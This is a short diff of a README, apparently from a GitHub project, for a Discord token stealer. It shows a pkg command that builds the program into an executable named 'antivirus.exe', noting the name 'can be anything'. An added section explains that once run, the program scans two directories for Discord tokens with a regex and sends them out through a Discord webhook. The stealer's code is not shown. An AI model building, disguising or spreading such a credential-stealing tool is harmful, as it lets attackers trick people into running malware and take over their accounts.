I2rys/ODiscord/Token Stealer/README.md

     pkg index.js -o antivirus.exe(Can be anything)
 For more info of pkg click [me](https://www.npmjs.com/package/pkg).

+## How does ODiscord Token Stealer works
+Once the file is runned, the file will check 2 directories where the Discord tokens will be logged and It will use regex to find Discord token/tokens then send it via Discord webhook.

 ## License
 <a href="https://github.com/I2rys/ODiscord/blob/main/LICENSE">MIT</a> © <a href="https://github.com/I2rys">I2rys</a>